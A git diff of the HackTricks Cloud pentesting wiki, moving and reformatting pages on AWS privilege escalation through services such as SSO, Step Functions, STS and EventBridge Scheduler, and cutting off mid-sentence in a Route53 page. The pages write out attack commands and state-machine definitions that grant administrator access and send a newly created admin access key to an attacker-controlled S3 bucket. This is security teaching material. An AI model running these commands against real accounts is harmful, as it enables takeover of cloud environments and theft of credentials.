an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. + +```bash +aws sqs receive-message --queue-url +aws sqs delete-message --queue-url --receipt-handle +aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout +``` + +**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md similarity index 60% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md index f496e89a3..aafbdcbda 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md @@ -1,27 +1,14 @@ # AWS - SSM Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SSM For more info about SSM check: -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} ### `ssm:SendCommand` @@ -63,9 +50,8 @@ aws ssm describe-sessions --state Active aws ssm start-session --target "$INSTANCE_ID" ``` -{% hint style="danger" %} -In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) -{% endhint %} +> [!CAUTION] +> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) **Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. @@ -79,7 +65,7 @@ Therefore, users with `ssm:StartSession` will be able to **get a shell inside EC aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` -![](<../../../.gitbook/assets/image (185).png>) +![](<../../../images/image (185).png>) **Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled. @@ -139,21 +125,8 @@ aws ssm get-command-invocation --command-id --instance-id You can also use SSM to get inside a codebuild project being built: -{% content-ref url="aws-codebuild-privesc.md" %} -[aws-codebuild-privesc.md](aws-codebuild-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-codebuild-privesc.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md similarity index 59% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md index cef6c3dc8..18ea35aeb 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md @@ -1,33 +1,19 @@ # AWS - SSO & identitystore Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## AWS Identity Center / AWS SSO For more information about AWS Identity Center / AWS SSO check: -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} -{% hint style="warning" %} -Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ -Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ -[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) -{% endhint %} +> [!WARNING] +> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ +> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ +> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) ### ~~Reset Password~~ @@ -37,17 +23,14 @@ An easy way to escalate privileges in cases like this one would be to have a per With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has. -{% code overflow="wrap" %} ```bash aws identitystore create-group-membership --identity-store-id --group-id --member-id UserId= ``` -{% endcode %} ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet` An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control -{% code overflow="wrap" %} ```bash # Set an inline policy with admin privileges aws sso-admin put-inline-policy-to-permission-set --instance-arn --permission-set-arn --inline-policy file:///tmp/policy.yaml @@ -68,13 +51,11 @@ aws sso-admin put-inline-policy-to-permission-set --instance-arn # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` -{% endcode %} ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet` An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control -{% code overflow="wrap" %} ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" @@ -82,17 +63,14 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` -{% endcode %} ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet` An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control. -{% hint style="warning" %} -To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. -{% endhint %} +> [!WARNING] +> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. -{% code overflow="wrap" %} ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference @@ -100,27 +78,22 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` -{% endcode %} ### `sso:CreateAccountAssignment` An attacker with this permission could give a Permission Set to a user under his control to an account. -{% code overflow="wrap" %} ```bash aws sso-admin create-account-assignment --instance-arn --target-id --target-type AWS_ACCOUNT --permission-set-arn --principal-type USER --principal-id ``` -{% endcode %} ### `sso:GetRoleCredentials` Returns the STS short-term credentials for a given role name that is assigned to the user. -{% code overflow="wrap" %} ``` aws sso get-role-credentials --role-name --account-id --access-token ``` -{% endcode %} However, you need an access token that I'm not sure how to get (TODO). @@ -128,53 +101,32 @@ However, you need an access token that I'm not sure how to get (TODO). An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. -{% code overflow="wrap" %} ```bash aws sso-admin detach-managed-policy-from-permission-set --instance-arn --permission-set-arn --managed-policy-arn ``` -{% endcode %} ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. -{% code overflow="wrap" %} ```bash aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference ``` -{% endcode %} ### `sso:DeleteInlinePolicyFromPermissionSet` An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**. -{% code overflow="wrap" %} ```bash aws sso-admin delete-inline-policy-from-permission-set --instance-arn --permission-set-arn ``` -{% endcode %} ### `sso:DeletePermissionBoundaryFromPermissionSet` An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary. -{% code overflow="wrap" %} ```bash aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn --permission-set-arn ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md similarity index 71% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md index 4084a2972..108dbcf3b 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -1,27 +1,14 @@ # AWS - Step Functions Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Step Functions For more information about this AWS service, check: -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-stepfunctions-enum.md +{{#endref}} ### Task Resources @@ -29,26 +16,24 @@ These privilege escalation techniques are going to require to use some AWS step In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in: -
+
Or you could also go to the API AWS documentation and check each action docs: -* [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) -* [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) +- [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) +- [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) ### `states:TestState` & `iam:PassRole` An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation. -{% code overflow="wrap" %} ```bash aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets] ``` -{% endcode %} The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action: -* **stateDefinition.json**: +- **stateDefinition.json**: ```json { @@ -61,9 +46,8 @@ The following examples show how to test an state that creates an access key for } ``` -* **Command** executed to perform the privesc: +- **Command** executed to perform the privesc: -{% code overflow="wrap" %} ```bash aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole @@ -80,7 +64,6 @@ aws stepfunctions test-state --definition file://stateDefinition.json --role-arn "status": "SUCCEEDED" } ``` -{% endcode %} **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. @@ -88,7 +71,6 @@ aws stepfunctions test-state --definition file://stateDefinition.json --role-arn An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine. -{% code overflow="wrap" %} ```bash # Create a state machine aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\ @@ -100,11 +82,10 @@ aws states start-execution --state-machine-arn [--name ] [--input # Start a Synchronous Express state machine execution aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ] ``` -{% endcode %} The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions. -* **stateMachineDefinition.json**: +- **stateMachineDefinition.json**: ```json { @@ -144,9 +125,8 @@ The following examples show how to create an state machine that creates an acces } ``` -* **Command** executed to **create the state machine**: +- **Command** executed to **create the state machine**: -{% code overflow="wrap" %} ```bash aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole { @@ -154,11 +134,9 @@ aws stepfunctions create-state-machine --name MaliciousStateMachine --definition "creationDate": "2024-07-09T20:29:35.381000+02:00" } ``` -{% endcode %} -* **Command** executed to **start an execution** of the previously created state machine: +- **Command** executed to **start an execution** of the previously created state machine: -{% code overflow="wrap" %} ```json aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine { @@ -166,11 +144,9 @@ aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:1 "startDate": "2024-07-09T20:33:35.466000+02:00" } ``` -{% endcode %} -{% hint style="warning" %} -The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. -{% endhint %} +> [!WARNING] +> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. @@ -183,21 +159,19 @@ Depending on how permissive is the IAM Role associated to the state machine is, 1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough. 2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition. -{% code overflow="wrap" %} ```bash aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \ [--tracing-configuration ] [--publish | --no-publish] [--version-description ] ``` -{% endcode %} The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. -{% hint style="warning" %} -If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). -{% endhint %} +> [!WARNING] +> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). + +{{#tabs }} +{{#tab name="Legit State Machine" }} -{% tabs %} -{% tab title="Legit State Machine" %} ```json { "Comment": "Hello world from Lambda state machine", @@ -222,9 +196,11 @@ If the state machine does not have a permissive IAM Role associated, it would al } } ``` -{% endtab %} -{% tab title="Malicious Updated State Machine" %} +{{#endtab }} + +{{#tab name="Malicious Updated State Machine" }} + ```json { "Comment": "Hello world from Lambda state machine", @@ -258,12 +234,12 @@ If the state machine does not have a permissive IAM Role associated, it would al } } ``` -{% endtab %} -{% endtabs %} -* **Command** executed to **update** **the legit state machine**: +{{#endtab }} +{{#endtabs }} + +- **Command** executed to **update** **the legit state machine**: -{% code overflow="wrap" %} ```bash aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json { @@ -271,21 +247,7 @@ aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-eas "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` -{% endcode %} **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md new file mode 100644 index 000000000..5fc330366 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md @@ -0,0 +1,122 @@ +# AWS - STS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## STS + +### `sts:AssumeRole` + +Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). + +For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +You can impersonate a role running: + +```bash +aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname +``` + +**Potential Impact:** Privesc to the role. + +> [!CAUTION] +> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ +> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. + +### **`sts:GetFederationToken`** + +With this permission it's possible to generate credentials to impersonate any user: + +```bash +aws sts get-federation-token --name +``` + +This is how this permission can be given securely without giving access to impersonate other users: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "VisualEditor0", + "Effect": "Allow", + "Action": "sts:GetFederationToken", + "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" + } + ] +} +``` + +### `sts:AssumeRoleWithSAML` + +A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** + +An example of a trust policy with this permission is: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "OneLogin", + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" + }, + "Action": "sts:AssumeRoleWithSAML", + "Condition": { + "StringEquals": { + "SAML:aud": "https://signin.aws.amazon.com/saml" + } + } + } + ] +} +``` + +To generate credentials to impersonate the role in general you could use something like: + +```bash +aws sts assume-role-with-saml --role-arn --principal-arn +``` + +But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): + +```bash +onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 +``` + +**Potential Impact:** Privesc to the role. + +### `sts:AssumeRoleWithWebIdentity` + +This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) + +For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: + +```bash +aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token +# The role name can be found in the metadata of the configuration of the pod +``` + +### Federation Abuse + +{{#ref}} +../aws-basic-information/aws-federation-abuse.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md similarity index 79% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md index 56e02e600..8756dbf07 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md @@ -4,9 +4,9 @@ For more info about WorkDocs check: -{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} -[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-directory-services-workdocs-enum.md +{{#endref}} ### `workdocs:CreateUser` @@ -44,8 +44,8 @@ aws workdocs add-resource-permissions --resource-id --principals Id=anonymo ### `workdocs:AddUserToGroup` -You can make a user admin by setting it in the group ZOCALO\_ADMIN.\ -For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html) +You can make a user admin by setting it in the group ZOCALO_ADMIN.\ +For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin` diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md new file mode 100644 index 000000000..f2b28170a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md @@ -0,0 +1,49 @@ +# AWS - EventBridge Scheduler Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## EventBridge Scheduler + +More info EventBridge Scheduler in: + +{{#ref}} +../aws-services/eventbridgescheduler-enum.md +{{#endref}} + +### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) + +An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action + +For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: + +```bash +aws scheduler create-schedule \ + --name MyLambdaSchedule \ + --schedule-expression "rate(5 minutes)" \ + --flexible-time-window "Mode=OFF" \ + --target '{ + "Arn": "arn:aws:lambda:::function:", + "RoleArn": "arn:aws:iam:::role/" + }' +``` + +In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: + +```bash +aws scheduler create-schedule \ + --name GrantAdminToTargetRoleSchedule \ + --schedule-expression "rate(5 minutes)" \ + --flexible-time-window "Mode=OFF" \ + --target '{ + "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", + "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", + "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" + }' +``` + +## References + +- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) +- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md new file mode 100644 index 000000000..d7b87303e --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md @@ -0,0 +1,32 @@ +# AWS - Route53 Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +For more information about Route53 check: + +{{#ref}} +../aws-services/aws-route53-enum.md +{{#endref}} + +### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` + +> [!NOTE] +> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. + +Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` + +Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca 